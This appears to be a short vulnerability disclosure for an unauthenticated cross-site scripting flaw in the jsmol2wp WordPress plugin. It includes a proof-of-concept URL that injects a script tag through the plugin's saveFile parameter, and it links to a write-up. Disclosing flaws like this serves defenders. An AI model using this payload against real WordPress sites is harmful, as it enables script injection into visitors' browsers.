The jsmol2wp WordPress plugin was affected by an Unauthenticated Cross-Site Scripting (XSS) security vulnerability.
http://localhost:8080/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call;=saveFile&data;=<script>alert(/xss/)</script>&mimetype;=text/html; charset=utf-8
www.cbiu.cc/2018/12/WordPress%E6%8F%92%E4%BB%B6jsmol2wp%E6%BC%8F%E6%B4%9E/#%E5%8F%8D%E5%B0%84%E6%80%A7XSS